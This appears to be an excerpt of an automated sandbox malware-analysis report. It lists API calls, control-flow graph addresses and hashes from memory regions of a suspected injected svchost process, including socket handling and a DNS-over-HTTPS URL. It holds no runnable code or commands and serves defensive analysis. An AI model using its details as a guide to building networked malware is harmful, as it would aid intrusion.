                                                                                    • SetFileCompletionNotificationModes.KERNEL32(05B6BDF5,00000003,?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C,05B6BDF5), ref: 05B6ACA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                    • String ID:
                                                                                    • API String ID: 3397353003-0
                                                                                    • Opcode ID: 22feccbec0f238c656a96de6284463656e3106f915e2a4eaf297a2a618355f64
                                                                                    • Instruction ID: 17e9be5250d332ccf05a489de1fb668fe6a381ad0229e42b280e4eb0a14c427f
                                                                                    • Opcode Fuzzy Hash: 22feccbec0f238c656a96de6284463656e3106f915e2a4eaf297a2a618355f64
                                                                                    • Instruction Fuzzy Hash: 7931C571144604EBDF269E24DD46B7A7AAAFF00358F184598FA03B7191EB78FA40C7A4

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 213 5b6b1b1-5b6b1c7 214 5b6b1d2-5b6b1d5 213->214 215 5b6b1c9-5b6b1cd 213->215 217 5b6b1f6-5b6b203 214->217 218 5b6b1d7-5b6b1e6 call 5b6bdce 214->218 216 5b6b2c6-5b6b2cc call 5b6bd00 215->216 226 5b6b2cd-5b6b2d0 216->226 220 5b6b205-5b6b212 call 5b6bf21 217->220 221 5b6b21e-5b6b254 memset 217->221 223 5b6b1eb-5b6b1f0 218->223 220->221 229 5b6b214-5b6b219 220->229 228 5b6b25d-5b6b25f 221->228 223->217 223->226 230 5b6b30f-5b6b313 226->230 231 5b6b261-5b6b269 228->231 232 5b6b2af-5b6b2ba GetLastError 228->232 235 5b6b2c3 229->235 233 5b6b2d2-5b6b2e0 231->233 236 5b6b26b-5b6b279 231->236 232->233 234 5b6b2bc-5b6b2c2 WSAGetLastError 232->234 237 5b6b2e2-5b6b2e7 233->237 238 5b6b2f8-5b6b30b 233->238 234->235 235->216 239 5b6b28e-5b6b2ad call 5b6c812 236->239 240 5b6b27b-5b6b27d 236->240 237->238 244 5b6b2e9-5b6b2f0 237->244 242 5b6b30d 238->242 239->242 240->239 241 5b6b27f-5b6b286 240->241 241->239 245 5b6b288-5b6b28b 241->245 242->230 244->238 247 5b6b2f2-5b6b2f5 244->247 245->239 247->238
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bdfdf908db1582a25867ec5e372573532024cffcffb5ae162623649fed189fa3
                                                                                    • Instruction ID: 5ebda001b87e4004d2cc65d0d16403c09eec5a4c9047ef82c4c0360c13e92fde
                                                                                    • Opcode Fuzzy Hash: bdfdf908db1582a25867ec5e372573532024cffcffb5ae162623649fed189fa3
                                                                                    • Instruction Fuzzy Hash: 374167B16102059FDB14DF25C885BA6BBB9FF05314F0481A9ED0ACF296DB38E805CBA0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 248 5b6bb4c-5b6bb62 249 5b6bb64-5b6bb69 248->249 250 5b6bb88-5b6bb8d 248->250 253 5b6bb77-5b6bb80 call 5b6bc89 249->253 254 5b6bb6b-5b6bb75 shutdown 249->254 251 5b6bbe0-5b6bbe6 250->251 252 5b6bb8f-5b6bb93 250->252 256 5b6bc0a-5b6bc10 251->256 257 5b6bbe8-5b6bbf1 251->257 252->251 255 5b6bb95-5b6bb9e call 5b6bc89 252->255 253->251 269 5b6bb82-5b6bb86 253->269 254->251 255->251 270 5b6bba0-5b6bba8 255->270 260 5b6bc34-5b6bc39 256->260 261 5b6bc12-5b6bc1b 256->261 257->256 262 5b6bbf3-5b6bbf5 257->262 266 5b6bc3b-5b6bc44 closesocket 260->266 267 5b6bc48-5b6bc54 260->267 261->260 265 5b6bc1d-5b6bc1f 261->265 262->256 268 5b6bbf7-5b6bbf9 262->268 265->260 271 5b6bc21-5b6bc23 265->271 266->267 272 5b6bc56-5b6bc58 267->272 273 5b6bc5a-5b6bc5d 267->273 268->256 274 5b6bbfb-5b6bc02 268->274 269->251 270->251 276 5b6bbaa-5b6bbac 270->276 271->260 277 5b6bc25-5b6bc2c 271->277 272->273 278 5b6bc60-5b6bc6e 272->278 273->278 274->256 275 5b6bc04-5b6bc07 274->275 275->256 279 5b6bbae-5b6bbb9 276->279 277->260 280 5b6bc2e-5b6bc31 277->280 281 5b6bc85-5b6bc88 278->281 282 5b6bc70-5b6bc75 278->282 283 5b6bbcf-5b6bbdc 279->283 284 5b6bbbb-5b6bbc2 279->284 280->260 282->281 285 5b6bc77-5b6bc82 282->285 283->279 287 5b6bbde-5b6bbdf 283->287 284->283 286 5b6bbc4-5b6bbcb closesocket 284->286 285->281 286->283 287->251
                                                                                    APIs
                                                                                    • shutdown.WS2_32(D7FF5605,00000001), ref: 05B6BB6F
                                                                                    • closesocket.WS2_32(?), ref: 05B6BBC5
                                                                                    • closesocket.WS2_32(D7FF5605), ref: 05B6BC3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: closesocket$shutdown
                                                                                    • String ID:
                                                                                    • API String ID: 3079814495-0
                                                                                    • Opcode ID: 5ea31034f55a804da29922dd677ff0602e4f309498a75f04d3e45a3defccc78d
                                                                                    • Instruction ID: 741b32d23397847e55e5683e26c335db429bea188f1e73377e6f5078e5effde3
                                                                                    • Opcode Fuzzy Hash: 5ea31034f55a804da29922dd677ff0602e4f309498a75f04d3e45a3defccc78d
                                                                                    • Instruction Fuzzy Hash: DA416A71518B059FEB348E25C455B62B7F1FF003A4F189A5DE893D6AA0CB39F546CB40

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 288 5b6ba74-5b6ba80 289 5b6ba82-5b6ba87 288->289 290 5b6ba9c-5b6bab5 288->290 289->290 291 5b6ba89-5b6ba8b 289->291 292 5b6bab7-5b6bad0 setsockopt 290->292 293 5b6bb0b-5b6bb21 call 5b6c0bb call 5b6bd00 290->293 291->290 295 5b6ba8d-5b6ba94 291->295 296 5b6bad2-5b6baee call 5b6afbc 292->296 297 5b6baf0-5b6bb09 WSAGetLastError call 5b6bd00 292->297 308 5b6bb24-5b6bb2f 293->308 295->290 300 5b6ba96-5b6ba99 295->300 296->308 297->308 300->290 310 5b6bb47-5b6bb4b 308->310 311 5b6bb31-5b6bb33 308->311 311->310 312 5b6bb35-5b6bb37 311->312 312->310 313 5b6bb39-5b6bb44 312->313 313->310
                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 05B6BAC8
                                                                                    • WSAGetLastError.WS2_32(?,05B69BAC,00000000,00000000,?,00000000,00000000,00000000,05B69A2D,00000000,?,00000000,05B63488,?,00000000,?), ref: 05B6BAF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 1729277954-0
                                                                                    • Opcode ID: e96894c4def4b41a9f228dbb48c1dcc97115e5e857f6ffef56c94a9827f305c6
                                                                                    • Instruction ID: a0a5d8bfd6ccada92c9f6cef616d5d7d192a40fae310d8c06ecdc63c433985ad
                                                                                    • Opcode Fuzzy Hash: e96894c4def4b41a9f228dbb48c1dcc97115e5e857f6ffef56c94a9827f305c6
                                                                                    • Instruction Fuzzy Hash: CA314A74204A06AFDB209F25C885E66B7B8FF09364B048659E95ADB685C734F411CB94
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032C00CD
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032C0279
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000003.2196728803.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_3_32c0000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                    • Instruction ID: c32fb80a5a9efa50835c74f409a3ffa00e8ba22a2d28db494e206044b1cb1fbf
                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                    • Instruction Fuzzy Hash: BC719071D2428ADFDB41CF98C981BEDBBF0AF09314F288199E465F7241C274AA91CF65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • malloc.MSVCRT ref: 05B6551F
                                                                                    • memset.MSVCRT ref: 05B65534
                                                                                      • Part of subcall function 05B6ED4F: memset.MSVCRT ref: 05B6ED5A
                                                                                      • Part of subcall function 05B6ED63: calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,05B65573,?,05B87BE8,?,?,?,00000000,00000000,0000017C), ref: 05B6ED86
                                                                                      • Part of subcall function 05B6F06E: strlen.MSVCRT ref: 05B6F07C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$callocmallocstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 285299393-0
                                                                                    • Opcode ID: a7979f55b45becd19308483faee48fd95861266170b6545ac317ff82d956d889
                                                                                    • Instruction ID: e5282d1b4aac0c689161bbc7b936f6c7b3cee1132ce16b0f75849586eb53a77f
                                                                                    • Opcode Fuzzy Hash: a7979f55b45becd19308483faee48fd95861266170b6545ac317ff82d956d889
                                                                                    • Instruction Fuzzy Hash: D21190B6B00700BBDB20AF94CD4AF5BBBA9EF40B10F044498F51997251C779F820C754

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 335 5b64f50-5b64f63 malloc call 5b6a8fd 337 5b64f68-5b64f6d 335->337 338 5b64f6f-5b64f7a free 337->338 339 5b64f7b-5b64f8a call 5b64f8b 337->339
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: bcf070cb6468ae2749009098a856ba24bbb31d298e37fc396ed2bd95a22daf24
                                                                                    • Instruction ID: 91b8b3a72831a1b4ecaf6b9e55b3f1cfff2af9fdc25c443691d49768ac9370a9
                                                                                    • Opcode Fuzzy Hash: bcf070cb6468ae2749009098a856ba24bbb31d298e37fc396ed2bd95a22daf24
                                                                                    • Instruction Fuzzy Hash: 1AD02B3B11C6219FDB6527307C0E9EB7FD7EF01160B004895FC0681080EF157401C2A7

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 342 5b6afe4-5b6b00f 343 5b6b024-5b6b02c 342->343 344 5b6b011-5b6b014 342->344 346 5b6b050-5b6b054 343->346 347 5b6b02e-5b6b033 343->347 344->343 345 5b6b016-5b6b01f 344->345 345->343 348 5b6b021 345->348 349 5b6b047-5b6b049 call 5b6b055 347->349 350 5b6b035-5b6b038 347->350 348->343 353 5b6b04e-5b6b04f 349->353 350->349 351 5b6b03a-5b6b044 CreateEventA 350->351 351->349 353->346
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,05B628A5,?,05B6A87B,?,05B628A5,05B628A5,05B653A0,?,05B653D5,05B65421,05B65376,?), ref: 05B6B03E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateEvent
                                                                                    • String ID:
                                                                                    • API String ID: 2692171526-0
                                                                                    • Opcode ID: a1d068c2771ac24d69944f954b4b136a605e38ffab2f2a1dc802ecaf43e507b6
                                                                                    • Instruction ID: d6f9fc503c75b3ded429b2ed0d6acc51b63e36f7313c5cfdfa782e7455d056d1
                                                                                    • Opcode Fuzzy Hash: a1d068c2771ac24d69944f954b4b136a605e38ffab2f2a1dc802ecaf43e507b6
                                                                                    • Instruction Fuzzy Hash: AD012575504701AFE735CE25D440A77BBFAFB88320F04895EE996C6A40E338F845CB50

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 354 5b6ed63-5b6ed8f calloc 355 5b6eda6-5b6edad 354->355 356 5b6ed91-5b6eda4 354->356 357 5b6edc4-5b6ee14 355->357 356->355 359 5b6edaf-5b6edc2 call 5b6ef90 call 5b6ee1d 356->359 365 5b6ee18-5b6ee1c 357->365 359->357 367 5b6ee16 359->367 367->365
                                                                                    APIs
                                                                                    • calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,05B65573,?,05B87BE8,?,?,?,00000000,00000000,0000017C), ref: 05B6ED86
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: calloc
                                                                                    • String ID:
                                                                                    • API String ID: 2635317215-0
                                                                                    • Opcode ID: 2f57be34e45820100d6de1deec8cb3575f4fcae74f88a9e8f426e76fc916c6fa
                                                                                    • Instruction ID: c4b2a729901924507573fd979e007df4edc38a48d631fe056bd5bcd3c84e0b5b
                                                                                    • Opcode Fuzzy Hash: 2f57be34e45820100d6de1deec8cb3575f4fcae74f88a9e8f426e76fc916c6fa
                                                                                    • Instruction Fuzzy Hash: 19212CB5914B009FD7208F2AD841A86FBE9FF94754F20481FE69AC3290DBB0F440CB54

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 368 5b622bc-5b622ca malloc 369 5b622e3-5b622e8 368->369 370 5b622cc-5b622e0 368->370 371 5b622ec-5b622f9 call 5b62303 369->371 372 5b622ea 369->372 370->369 374 5b622fe-5b62302 371->374 372->371
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc
                                                                                    • String ID:
                                                                                    • API String ID: 2803490479-0
                                                                                    • Opcode ID: df0667c74f8202bac1d1bee4e526b2f8b6f4d6581ee99f3f5b62d38cb322d280
                                                                                    • Instruction ID: dbf5234e0542b1a3740e34edf7fe6878c7a3462fa5cf778f37a228e2c4af0d59
                                                                                    • Opcode Fuzzy Hash: df0667c74f8202bac1d1bee4e526b2f8b6f4d6581ee99f3f5b62d38cb322d280
                                                                                    • Instruction Fuzzy Hash: 3BF0F8B96042099FDF098F94D854DA97FA6FF48310B0540ADFD0A8B360CB35E820DB64
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000003.2196728803.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_3_32c0000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86FBC,00000001,00000000,?,05B63ABF,?,?), ref: 05B6594F
                                                                                    • memcmp.MSVCRT(?,05B86FB8,00000002), ref: 05B6597E
                                                                                    • memcmp.MSVCRT(?,05B86FB4,00000003), ref: 05B659BE
                                                                                    • memcmp.MSVCRT(?,05B86FA0,00000004), ref: 05B65A53
                                                                                    • memcmp.MSVCRT(?,05B86F98,00000005), ref: 05B65A97
                                                                                    • memcmp.MSVCRT(?,05B86F70,00000006), ref: 05B65B55
                                                                                    • memcmp.MSVCRT(?,05B86F58,00000007), ref: 05B65BD1
                                                                                    • memcmp.MSVCRT(?,05B86F3C,00000008), ref: 05B65C4F
                                                                                    • memcmp.MSVCRT(?,05B86F18,00000009), ref: 05B65CCB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    APIs
                                                                                    • socket.WS2_32(00003A9A,00000001,00000000), ref: 05B6ADE5
                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,05B6BA4B,?,00000000,?,00000000,00000000,?,00000000), ref: 05B6AE22
                                                                                    • closesocket.WS2_32(00000000), ref: 05B6AE5D
                                                                                    • memset.MSVCRT ref: 05B6AE73
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 05B6AED4
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6AEE1
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6AEEB
                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 05B6AEF3
                                                                                    • closesocket.WS2_32(?), ref: 05B6AF17
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 05B6AF25
                                                                                    • RegisterWaitForSingleObject.KERNEL32(00000154,?,05B6AF9E,00000000,000000FF,00000004), ref: 05B6AF62
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1241441197-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsstrlen$callocinet_addrmemset
                                                                                    • String ID: https://cloudflare-dns.com/dns-query
                                                                                    • API String ID: 1536131324-770057447
                                                                                    APIs
                                                                                    • shutdown.WS2_32(?,00000001), ref: 05B6A9E0
                                                                                    • WSAGetLastError.WS2_32(?,00000000,?,05B69AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05B69A33,00000000,00000000,?,00000000), ref: 05B6A9F1
                                                                                    • closesocket.WS2_32(?), ref: 05B6AA67
                                                                                    • UnregisterWait.KERNEL32(?), ref: 05B6AAAC
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,05B69AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05B69A33,00000000), ref: 05B6AAC6
                                                                                    • free.MSVCRT ref: 05B6AAEC
                                                                                    • UnregisterWait.KERNEL32(?), ref: 05B6AB0D
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,05B69AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,05B69A33,00000000), ref: 05B6AB1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 3261266694-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$memset
                                                                                    • String ID:
                                                                                    • API String ID: 4054172246-0
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,05B6CC99,?,000000FF,00000000,00000000), ref: 05B6C3B8
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,05B6CC99), ref: 05B6C3F9
                                                                                    • GetLastError.KERNEL32(?,?,?,05B6CC99), ref: 05B6C404
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,05B6CC99), ref: 05B6C40D
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,05B6CC99), ref: 05B6C414
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,05B6CC99), ref: 05B6C423
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,05B6CC99), ref: 05B6C446
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1659421480-0
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86EC0,0000000C), ref: 05B65DFF
                                                                                    • memcmp.MSVCRT(?,05B86EB0,0000000C), ref: 05B65E21
                                                                                    • memcmp.MSVCRT(?,05B86EA0,0000000C), ref: 05B65E43
                                                                                    • memcmp.MSVCRT(?,05B86E80,0000000C), ref: 05B65E83
                                                                                    • memcmp.MSVCRT(?,05B86E70,0000000C), ref: 05B65EA5
                                                                                    • memcmp.MSVCRT(?,05B86E60,0000000C), ref: 05B65EC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp$callocfree
                                                                                    • String ID: factfmt RIFFdata
                                                                                    • API String ID: 254810267-2461439165
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$calloc
                                                                                    • String ID:
                                                                                    • API String ID: 1504270956-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: strchr$memset
                                                                                    • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                    • API String ID: 3020236661-885041942
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69C9B
                                                                                    • InterlockedCompareExchange.KERNEL32(05B6CC90,00000000,00000000), ref: 05B69CAD
                                                                                    • SetEvent.KERNEL32(00000000,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69CBE
                                                                                    • CloseHandle.KERNEL32(00000000,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69CCA
                                                                                    • WaitForSingleObject.KERNEL32(05B6CC8C,000000FF,?,05B69C8B,00000000,05B6CC8C,05B6CCD3,05B87D20,05B6CCDB,05B6CC8C,00000000), ref: 05B69CD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 4206309166-0
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86E30,0000000E), ref: 05B65F62
                                                                                    • memcmp.MSVCRT(?,05B86E20,0000000E), ref: 05B65F84
                                                                                    • memcmp.MSVCRT(?,05B86E10,0000000E), ref: 05B65FA6
                                                                                    • memcmp.MSVCRT(?,05B86E00,0000000E), ref: 05B65FC8
                                                                                    • memcmp.MSVCRT(?,05B86DF0,0000000E), ref: 05B65FEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,05B86DE0,0000000F), ref: 05B66025
                                                                                    • memcmp.MSVCRT(?,05B86DD0,0000000F), ref: 05B66043
                                                                                    • memcmp.MSVCRT(?,05B86DC0,0000000F), ref: 05B66065
                                                                                    • memcmp.MSVCRT(?,05B86DB0,0000000F), ref: 05B66087
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1475443563-0
                                                                                    • Opcode ID: 9fb770b4e201816a92d3841c2019fa870315badcd4d09ca8a9da83c3a4e2f46a
                                                                                    • Instruction ID: 2a717afe816ebc38c4788233f87b2e90dc7c1092b28b3dae89adef124cf53234
                                                                                    • Opcode Fuzzy Hash: 9fb770b4e201816a92d3841c2019fa870315badcd4d09ca8a9da83c3a4e2f46a
                                                                                    • Instruction Fuzzy Hash: EE01AD62B8562262D7203E2C1E87F7E3395AB30694F4430F1FD05E564AF249F609D29A
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 05B64236
                                                                                    • getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 05B64259
                                                                                    • htons.WS2_32(00000006), ref: 05B642BE
                                                                                    • FreeAddrInfoW.WS2_32(00000000), ref: 05B642D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                    • String ID:
                                                                                    • API String ID: 928751204-0
